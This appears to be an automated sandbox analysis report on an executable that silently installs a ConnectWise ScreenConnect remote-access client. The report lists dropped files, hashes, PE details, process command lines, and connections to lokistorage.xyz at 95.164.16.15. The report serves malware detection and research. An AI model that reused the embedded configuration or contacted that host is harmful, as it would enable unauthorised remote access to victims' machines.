SHA-256:	48863C6092BC5FFAC80A2B14AB321E4178D07E19B0766641EB623746F2CEE8D0
SHA-512:	D093DE30342199D12158ED7DF2C71F9D9D34DD50052DCFB29028387AA371F8E8EAB23653379408C5BF1A6EEAD4F155635A24A26939265C907822B121F3E5D598
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a25</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	5.363907225770245
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
MD5:	E88F0E3AD82AC5F6557398EBC137B0DE
SHA1:	20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
SHA-256:	278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
SHA-512:	CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

C:\Windows\Temp\~DF13DF979B088354D2.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4233284923459448
Encrypted:	false
SSDEEP:	48:5pSuEI+xFX4rT5hUj/94qcq56AdubSiVAld6S2070B3uQca2iQR6YEwg483iFrmE:7SToTXItpKfVId6l/XtQopAuu
MD5:	EDF526DD42209019FD9819317FBA3B87
SHA1:	6F0241CA85C861C138849ED22F8D13E7F5313AA5
SHA-256:	CA5D39681170EFC87C472AACC80EE5D6C77FCCE80CFBEA76F07B11506D1F896C
SHA-512:	AE1C86E50FC4EA9BA57BD44E0E3E031FD7E4718619D1424196A64D7ABB15286A552643973F678315DC9BDED3C8712BF3C9453A878402414E35449630C08F6864
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF1A7705DD0513E5A1.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.804236085651902
Encrypted:	false
SSDEEP:	48:t8Ph6uRc06WX4IjT5p/94qcq56AdubSiVAld6S2070B3uQca2iQR6YEwg483iFr3:Qh614jTdtpKfVId6l/XtQopAuu
MD5:	77C86B353517D7DA5C354E902EB372C2
SHA1:	10C83F9A8F77CBF6515B839F4D96DD9DFCAEC150
SHA-256:	5D7E3A3DA8954FF1911925EE9D6783D73BC72FF93E3C27ACE9A1533B6CCCA27A
SHA-512:	A681979B897B7315145A6DA48F4CB055F25787057181E3C7400DA9DCAFA1EABD57BF86E6F93D8504354A4715B6EC99B2C3715BFDB79A6CA7A7A123627993DA17
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF78BB5F432A31DB91.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF818ACAEDE421E112.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF92E06AD225F52211.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9D3F9E54735C2221.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4233284923459448
Encrypted:	false
SSDEEP:	48:5pSuEI+xFX4rT5hUj/94qcq56AdubSiVAld6S2070B3uQca2iQR6YEwg483iFrmE:7SToTXItpKfVId6l/XtQopAuu
MD5:	EDF526DD42209019FD9819317FBA3B87
SHA1:	6F0241CA85C861C138849ED22F8D13E7F5313AA5
SHA-256:	CA5D39681170EFC87C472AACC80EE5D6C77FCCE80CFBEA76F07B11506D1F896C
SHA-512:	AE1C86E50FC4EA9BA57BD44E0E3E031FD7E4718619D1424196A64D7ABB15286A552643973F678315DC9BDED3C8712BF3C9453A878402414E35449630C08F6864
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA42611B87D8BDD15.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA72C830E7782AAEA.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.06895694008873562
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOSCP3Qx7EM2GyVky6l3X:2F0i8n0itFzDHFSCP3yME3X
MD5:	10EB4E0AB48171BB478A0C20EAE2E328
SHA1:	25279E0BE128641716BBA86A8250F0E6CE65A818
SHA-256:	2D5A512B14973E54E548B528A09B1E4B36F57AEEC416529A3FA6182E636CCEED
SHA-512:	C4176FD19662A3EF8F224D98AAF3603C66E03A8DCD499A5D190F03068C1AA56455EA37A0F2C0CE7E22C04C09A0AECD87AD813F7F46D9691ECCE33AE542B04BA7
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB2287BD0585A6A9F.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.804236085651902
Encrypted:	false
SSDEEP:	48:t8Ph6uRc06WX4IjT5p/94qcq56AdubSiVAld6S2070B3uQca2iQR6YEwg483iFr3:Qh614jTdtpKfVId6l/XtQopAuu
MD5:	77C86B353517D7DA5C354E902EB372C2
SHA1:	10C83F9A8F77CBF6515B839F4D96DD9DFCAEC150
SHA-256:	5D7E3A3DA8954FF1911925EE9D6783D73BC72FF93E3C27ACE9A1533B6CCCA27A
SHA-512:	A681979B897B7315145A6DA48F4CB055F25787057181E3C7400DA9DCAFA1EABD57BF86E6F93D8504354A4715B6EC99B2C3715BFDB79A6CA7A7A123627993DA17
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBC6DE0780AF8FC53.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.23590537976399656
Encrypted:	false
SSDEEP:	48:JQhDBAdubS3qcq56AdubSiVAld6S2070B3uQca2iQR6YEwg483iFrCn/:6TxpKfVId6l/XtQopAk
MD5:	C529343AC21838E80943AB6CF9BC768A
SHA1:	9DB9017BA34E5DCEE47F7D44E1404BF4D88B151A
SHA-256:	5FE9ABD43D3F14028D485D0836760B04B13E036309121270D09E3CCA04AAA100
SHA-512:	71D40A957982309C49A9F565C2E287A2983FE0DB398B0402201D8D508D94B94DF149BD04DB7282C023D73AD87F1028B607B0BCAD7AD0406E2D9C1473BEC73AB5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC42B4097C95FF941.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC525869B86C8CEE6.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4233284923459448
Encrypted:	false
SSDEEP:	48:5pSuEI+xFX4rT5hUj/94qcq56AdubSiVAld6S2070B3uQca2iQR6YEwg483iFrmE:7SToTXItpKfVId6l/XtQopAuu
MD5:	EDF526DD42209019FD9819317FBA3B87
SHA1:	6F0241CA85C861C138849ED22F8D13E7F5313AA5
SHA-256:	CA5D39681170EFC87C472AACC80EE5D6C77FCCE80CFBEA76F07B11506D1F896C
SHA-512:	AE1C86E50FC4EA9BA57BD44E0E3E031FD7E4718619D1424196A64D7ABB15286A552643973F678315DC9BDED3C8712BF3C9453A878402414E35449630C08F6864
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.455093193237826
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	H36NgltNe7.exe
File size:	5'809'056 bytes
MD5:	06ad0256587c76c2c405663aebee2a46
SHA1:	7b7181734688075a4b226eb1db816a8af6e0f87c
SHA256:	2baad4cb8a8d6af1916b38237bb766c89c2bde59d555b73484722a48463d4a6f
SHA512:	6c31a8b82fb6be789ca2ff2be50d9ae169a4eb767b33d9abfdc84b0f8cae86b4079824cb374ac2c4d1c5a5566ea68b98749de5770d0eacd6ad2360ee03079af3
SSDEEP:	98304:34s6efPOEnXkHywo+EVhaecMUzG4uc96ob2zsf:ofefPFZs6Uruc9Xbr
TLSH:	4246F101B3D599B9D5BF0678D87A42699A34BC048316C7FF93D4B9293E32BC04E32766
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014ad
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	9771ee6344923fa220489ab01239bdfd

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 02:00:00 16/08/2025 01:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007FEE44F2F44Ah
jmp 00007FEE44F2EEFFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040D040h]
push dword ptr [ebp+08h]
call dword ptr [0040D03Ch]
push C0000409h
call dword ptr [0040D044h]
push eax
call dword ptr [0040D048h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040D04Ch]
test eax, eax
je 00007FEE44F2F087h
push 00000002h
pop ecx
int 29h
mov dword ptr [004148D8h], eax
mov dword ptr [004148D4h], ecx
mov dword ptr [004148D0h], edx
mov dword ptr [004148CCh], ebx
mov dword ptr [004148C8h], esi
mov dword ptr [004148C4h], edi
mov word ptr [004148F0h], ss
mov word ptr [004148E4h], cs
mov word ptr [004148C0h], ds
mov word ptr [004148BCh], es
mov word ptr [004148B8h], fs
mov word ptr [004148B4h], gs
pushfd
pop dword ptr [004148E8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004148DCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004148E0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004148ECh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00414828h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[IMP] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x129c4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x53747c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x54a600	0x3fda0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54e000	0xea8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f20	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x11e60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb1af	0xb200	d9fa6da0baf4b869720be833223490cb	False	0.6123156601123596	data	6.592039633797327	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xd000	0x6078	0x6200	8b45a1035c0de72f910a75db7749f735	False	0.41549744897959184	data	4.786621464556291	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x14000	0x11e4	0x800	1f4cc86b6735a74429c9d1feb93e2871	False	0.18310546875	data	2.265083745848167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x16000	0x53747c	0x537600	9031d2d9e81b0f6feb6373861cf5cdaa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x54e000	0xea8	0x1000	a93b0f39998e1e69e5944da8c5ff06b1	False	0.72265625	data	6.301490309336801	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
FILES	0x163d4	0x85600	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.3967589473992502
FILES	0x9b9d4	0x1a4400	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.5110044479370117
FILES	0x23fdd4	0x1ac00	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.44113244742990654
FILES	0x25a9d4	0x2f1320	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows			0.9811086654663086
FILES	0x54bcf4	0x1600	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows			0.3908025568181818
RT_MANIFEST	0x54d2f4	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
mscoree.dll	CorBindToRuntimeEx
KERNEL32.dll	GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll	VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-12T18:40:36.308292+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.8	49708	TCP
2024-11-12T18:41:04.675325+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.8	63743	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 18:40:25.941838980 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:40:25.946747065 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:25.946842909 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:40:26.530371904 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:40:26.535248995 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:26.807744026 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:26.843333006 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:40:26.848326921 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:27.124286890 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:27.124778986 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:27.124878883 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:40:29.194511890 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:40:29.194679976 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:40:29.199500084 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:29.199516058 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:29.199537992 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:29.199548006 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:40:29.199569941 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:41:29.209702015 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:41:29.214835882 CET	8041	49707	95.164.16.15	192.168.2.8
Nov 12, 2024 18:42:29.225667953 CET	49707	8041	192.168.2.8	95.164.16.15
Nov 12, 2024 18:42:29.231748104 CET	8041	49707	95.164.16.15	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 18:40:25.833100080 CET	61300	53	192.168.2.8	1.1.1.1
Nov 12, 2024 18:40:25.877652884 CET	53	61300	1.1.1.1	192.168.2.8
Nov 12, 2024 18:41:02.498578072 CET	53	57664	162.159.36.2	192.168.2.8
Nov 12, 2024 18:41:03.133719921 CET	53	54856	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 12, 2024 18:40:25.833100080 CET	192.168.2.8	1.1.1.1	0xbd43	Standard query (0)	lokistorage.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 12, 2024 18:40:25.877652884 CET	1.1.1.1	192.168.2.8	0xbd43	No error (0)	lokistorage.xyz		95.164.16.15	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	12:40:16
Start date:	12/11/2024
Path:	C:\Users\user\Desktop\H36NgltNe7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\H36NgltNe7.exe"
Imagebase:	0x660000
File size:	5'809'056 bytes
MD5 hash:	06AD0256587C76C2C405663AEBEE2A46
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1493878183.00000000052E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1486363645.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	12:40:18
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
Imagebase:	0x120000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	12:40:19
Start date:	12/11/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6ffa20000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	12:40:20
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 10C72F14AAC88ABBC0F40DDD9214C022 C
Imagebase:	0x120000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	12:40:20
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7294250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	12:40:22
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 03D5F726DB338ACF6E810EBD73840770
Imagebase:	0x120000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	12:40:23
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding FE76E3AF69419F4753BCF881322892BA E Global\MSI0000
